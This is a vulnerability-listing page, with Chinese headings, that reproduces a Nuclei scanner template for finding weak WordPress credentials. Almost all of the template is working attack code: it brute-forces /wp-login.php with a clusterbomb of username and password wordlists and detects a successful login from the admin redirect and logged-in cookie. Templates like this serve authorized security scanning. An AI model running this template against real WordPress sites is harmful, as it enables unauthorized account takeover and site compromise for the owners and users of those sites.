wordpress-weak-credentials: WordPress - Weak Credentials

日期: 2025-08-01 | 影响软件: wordpress | POC: 已公开

漏洞描述

Weak WordPress Credentials were discovered.

PoC代码[已公开]

id: wordpress-weak-credentials

info:
  name: WordPress - Weak Credentials
  author: evolutionsec
  severity: critical
  description: |
    Weak WordPress Credentials were discovered.
  reference:
    - https://www.wpwhitesecurity.com/strong-wordpress-passwords-wpscan/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
    cvss-score: 9.3
    cwe-id: CWE-1391
  metadata:
    max-request: 276
  tags: wordpress,default-login,fuzz,fuzzing,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}

        log={{users}}&pwd={{passwords}}

    attack: clusterbomb
    payloads:
      users: helpers/wordlists/wp-users.txt
      passwords: helpers/wordlists/wp-passwords.txt
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - '/wp-admin'
          - 'wordpress_logged_in'
        condition: and

      - type: status
        status:
          - 302
# digest: 4b0a00483046022100bec1c60f8371f4dea53355507f7fa11f40b4c9afba0227b54fdbaa7f0c1b45fb022100925cf7bba880dccfbe34f24aea418961b5446546911ed5b7fc3dcd8850e41f8f:922c64590222798bb761d5b6d8e72950

相关漏洞推荐